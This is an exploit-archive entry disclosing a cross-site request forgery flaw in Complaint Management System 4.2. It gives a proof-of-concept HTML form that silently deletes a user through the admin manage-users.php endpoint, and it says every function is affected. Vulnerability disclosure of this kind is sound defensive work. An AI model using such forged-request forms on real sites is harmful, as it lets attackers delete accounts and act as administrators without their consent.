Complaint Management System 4.2 Cross Site Request Forgery

Complaint Management System version 4.2 suffers from a cross site request forgery vulnerability.

MD5 | 5292e9d42254957153a8866da38c5d6e

# Exploit Title: Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)
# Author: Besim ALTINOK
# Vendor Homepage:
# Software Link:
# Version: v4.2
# Tested on: Xampp
# Credit: İsmail BOZKURT

You can perform CSRF Attack for all the functions.


CSRF PoC for Delete User
This request performs over the GET request with uid.
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/cms/admin/manage-users.php">
<input type="hidden" name="uid" value="4" />
<input type="hidden" name="" value="" />
<input type="hidden" name="action" value="del" />
<input type="submit" value="Submit request" />

Related Posts